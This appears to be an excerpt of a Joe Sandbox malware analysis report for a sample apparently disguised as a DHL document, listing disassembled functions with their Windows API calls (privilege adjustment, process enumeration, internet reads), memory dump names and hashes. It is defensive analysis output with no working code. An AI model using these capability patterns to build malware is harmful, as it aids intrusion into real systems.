                                                                                        Function 00C04B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C04AD0), ref: 00C04B45
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C04B57
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: 384ad8db6dffded6e40f1ae1f37f27d2f6d9175db3b53d2b11ccb58b0d88e7cb
                                                                                        • Instruction ID: d63a6f371dd45177ee9fcd84ebe4a319f2560758ed0c2d1cd8aa65cb7bcee960
                                                                                        • Opcode Fuzzy Hash: 384ad8db6dffded6e40f1ae1f37f27d2f6d9175db3b53d2b11ccb58b0d88e7cb
                                                                                        • Instruction Fuzzy Hash: A4D01775A10B13CFD720AF32E828B1A76E8AF45795B11883E9496D6190E674E881CB5C
                                                                                        Function 00C13030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 674341424-0
                                                                                        • Opcode ID: 3cfac3ab97b5a5e00f1beaac3da5cea9ebe370490a346986493a6dad10914c2b
                                                                                        • Instruction ID: 95e270558ceff3508d47c4fdf02e6e325fc554bc99e5c409efc40b8ae1a493b0
                                                                                        • Opcode Fuzzy Hash: 3cfac3ab97b5a5e00f1beaac3da5cea9ebe370490a346986493a6dad10914c2b
                                                                                        • Instruction Fuzzy Hash: 16229C716083409FD724DF14C881BAEB7E4FF86314F10491DF89A97292DB71EA85DB92
                                                                                        Function 00C7EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7EE3D
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00C7EE4B
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00C7EF0B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C7EF1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2576544623-0
                                                                                        • Opcode ID: 22adf29e9ef972da01eb8ff574b203e1aafffe30eee78156498d4033d9b43978
                                                                                        • Instruction ID: 06222c86d2b5272cacf962aeec7905acfc331fcc6a2067edadc7f3e2c1a4b085
                                                                                        • Opcode Fuzzy Hash: 22adf29e9ef972da01eb8ff574b203e1aafffe30eee78156498d4033d9b43978
                                                                                        • Instruction Fuzzy Hash: 4D517B71508711AFD310EF24CC85F6BB7E8EF98710F10892DF595962A2EB70A909DB92
                                                                                        Function 00C5E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C5E628
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($|
                                                                                        • API String ID: 1659193697-1631851259
                                                                                        • Opcode ID: 3680ebffd77339e8bae74f83d1fca7dff0e7e641136c4c67288855a92fe1c159
                                                                                        • Instruction ID: 93c8fc7fe3af02ac35daf96e5c6020433bcef2d5b1e4ad44e697e38287cda4d1
                                                                                        • Opcode Fuzzy Hash: 3680ebffd77339e8bae74f83d1fca7dff0e7e641136c4c67288855a92fe1c159
                                                                                        • Instruction Fuzzy Hash: 3C322879A007059FD728DF19C48196AB7F1FF48310B15C56EE8AADB3A1DB70EA81CB44
                                                                                        Function 00C722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C7180A,00000000), ref: 00C723E1
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C72418
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: cd4e7eb464dbdc17b8d25410e35434139c3755b09ce18e5638c632d9ae4b70b7
                                                                                        • Instruction ID: 72bd6eb96f3c7c6855433b1167b592011cc4b84913b7b92ade0bdc18740def0a
                                                                                        • Opcode Fuzzy Hash: cd4e7eb464dbdc17b8d25410e35434139c3755b09ce18e5638c632d9ae4b70b7
                                                                                        • Instruction Fuzzy Hash: 5841F671904209BFEB20DE95DC81FBFB7BCEB40324F10806EF659A7251DB759E41A660
                                                                                        Function 00C6B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C6B40B
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C6B465
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C6B4B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: 211412a2b3ed74d37a7e6a389f450f03914cdeffe6df5359755b376e141ed7c2
                                                                                        • Instruction ID: 33639cb908f01ebcd651a54626c7dce88d0f70bce748b24512fb9365f6f8de9c
                                                                                        • Opcode Fuzzy Hash: 211412a2b3ed74d37a7e6a389f450f03914cdeffe6df5359755b376e141ed7c2
                                                                                        • Instruction Fuzzy Hash: 54216075A00108EFCB00EFA5D884BEDBBB8FF49310F1481A9E905EB392DB319956DB55
                                                                                        Function 00C587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5882B
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C58858
                                                                                        • GetLastError.KERNEL32 ref: 00C58865
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 19fe29d003fb9b1a798ea5ef9c033b6a5f893b1b7069fbbee81b3a1d676554ff
                                                                                        • Instruction ID: 719046002b3dcc7052e2d74537bd058d3769e03a977b979810482c2f6c0629d9
                                                                                        • Opcode Fuzzy Hash: 19fe29d003fb9b1a798ea5ef9c033b6a5f893b1b7069fbbee81b3a1d676554ff
                                                                                        • Instruction Fuzzy Hash: 6511BFB2404204AFE718DFA4EC85E2BB7F8EB04311B20852EF85593652EB70BC458B64
                                                                                        Function 00C5874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C58774
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C5878B
                                                                                        • FreeSid.ADVAPI32(?), ref: 00C5879B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 335811f02de739511982f8b0bea1eaecdb71bf47d1afbecb080f62858b7c2f78
                                                                                        • Instruction ID: b0b0a80ab1365dceb7f842185f5642acc33f60670e60d058418f93a8a3816ad5
                                                                                        • Opcode Fuzzy Hash: 335811f02de739511982f8b0bea1eaecdb71bf47d1afbecb080f62858b7c2f78
                                                                                        • Instruction Fuzzy Hash: 30F04975A1130CBFDF00DFF4DC89AAEBBBCEF08201F1044A9A901E2181E7756A488B54
                                                                                        Function 00C6C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C6C6FB
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6C72B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 0987b1b7b80e319c5d297b55ad901b4ac648a7d1b42ee8c4c0ab6045b9c93f65
                                                                                        • Instruction ID: c8dc2be45f2226a1d3df439ad81aa1f501a06675f997e599a1a424e24abac10d
                                                                                        • Opcode Fuzzy Hash: 0987b1b7b80e319c5d297b55ad901b4ac648a7d1b42ee8c4c0ab6045b9c93f65
                                                                                        • Instruction Fuzzy Hash: 6B118E726002009FDB10DF29C885A2AF7E8EF85320F00C61DF9A9C73A1DB30A805CB81
                                                                                        Function 00C6A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C79468,?,00C8FB84,?), ref: 00C6A097
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C79468,?,00C8FB84,?), ref: 00C6A0A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 27c7457e72708a1acfdd3b7c200a85062ac4c6f5f73e4bcc8b04a1e6f4a491d1
                                                                                        • Instruction ID: f3f242ce33594ba6135e2d31fb5cdaca16c2e66a6f4609945f26c1ea881d8897
                                                                                        • Opcode Fuzzy Hash: 27c7457e72708a1acfdd3b7c200a85062ac4c6f5f73e4bcc8b04a1e6f4a491d1
                                                                                        • Instruction Fuzzy Hash: 8BF0823551522DABDB21AFA4CC88FEE776CBF08361F00426AF919D6191DA309A40CBA1
                                                                                        Function 00C581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C58309), ref: 00C581E0
                                                                                        • CloseHandle.KERNEL32(?,?,00C58309), ref: 00C581F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 0c30078936569b6ce46d828c538dedc6fdf359bd1d6c303c20ce4c70d00ae564
                                                                                        • Instruction ID: dbc57c152cccf74307eb565d912d3d5b1d888d9523e4c7419419528c70b74bfe
                                                                                        • Opcode Fuzzy Hash: 0c30078936569b6ce46d828c538dedc6fdf359bd1d6c303c20ce4c70d00ae564
                                                                                        • Instruction Fuzzy Hash: F4E0E671010510AFE7252B60FC05E777BE9EF04311725882DF8A5C4471DB615CD1DB14
                                                                                        Function 00C2A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C28D57,?,?,?,00000001), ref: 00C2A15A
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C2A163
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 7e84f4737fef318447f0b7d23208bed80af1d815630e81a594182fac9dbc1940
                                                                                        • Instruction ID: 80a7117f44c2b0ed5352d5b44e18304710cde735bee43b24cf41d9d2e196b356
                                                                                        • Opcode Fuzzy Hash: 7e84f4737fef318447f0b7d23208bed80af1d815630e81a594182fac9dbc1940
                                                                                        • Instruction Fuzzy Hash: 8FB09231254308ABCA002B91EC09B8C3F68EB46AA2F404024F60D84070CB6264528B99
                                                                                        Function 00C2F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 539a324b783c422d36ab7e5d51dd8cf55f122a484264644eebd32d25d098f17e
                                                                                        • Instruction ID: d0037017becae0723c6e16664c3f76f7995e31beb3ca90ad4c714e715c264e27
                                                                                        • Opcode Fuzzy Hash: 539a324b783c422d36ab7e5d51dd8cf55f122a484264644eebd32d25d098f17e
                                                                                        • Instruction Fuzzy Hash: 7332F231D2AF554ED7239634D836339A258AFB73C4F15D73BE82AB5DA5EB28C5834100
                                                                                        Function 00C3242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 133d7729e60f72666e8d89df83d36f151349503f71e6aa9973afedc591cc390b
                                                                                        • Instruction ID: fe187e573cc930b7d474691c848a07603421c309feef2e26b47bd6b614815dc6
                                                                                        • Opcode Fuzzy Hash: 133d7729e60f72666e8d89df83d36f151349503f71e6aa9973afedc591cc390b
                                                                                        • Instruction Fuzzy Hash: F2B1EE31E2AF404DD7239639883533ABA5CAFBB6C5F51E71BFC2674D22EB2185834181
                                                                                        Function 00C68889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 00C6889B
                                                                                          • Part of subcall function 00C2520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C68F6E,00000000,?,?,?,?,00C6911F,00000000,?), ref: 00C25213
                                                                                          • Part of subcall function 00C2520A: __aulldiv.LIBCMT ref: 00C25233
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID:
                                                                                        • API String ID: 2893107130-0
                                                                                        • Opcode ID: 4c25ec6fc51fbff44da57903b504c4622753938628ad5be8e5418bd0031466ab
                                                                                        • Instruction ID: 6fe31332f126fccebb3a6b7499fd7c3ba21769946831d6aecac801165abe6853
                                                                                        • Opcode Fuzzy Hash: 4c25ec6fc51fbff44da57903b504c4622753938628ad5be8e5418bd0031466ab
                                                                                        • Instruction Fuzzy Hash: 1F21AF726256108BC729CF29D881B56B3E1EFA9311B688F6CD0F5CB2C0CA34A909CB54
                                                                                        Function 00C64C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C64C76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: 5216324e8a273fa3f51eba3e328d8e2d29e68eaee775c0408af8a1e509992730
                                                                                        • Instruction ID: 897310d3765bad4b2394acee340a6b0c1cd1082f082e7999984d87e13620ad88
                                                                                        • Opcode Fuzzy Hash: 5216324e8a273fa3f51eba3e328d8e2d29e68eaee775c0408af8a1e509992730
                                                                                        • Instruction Fuzzy Hash: 3AD09EA416261979EC3C07209DDBF7E3109E3C1791F94954A7251952C1E8E46941A139
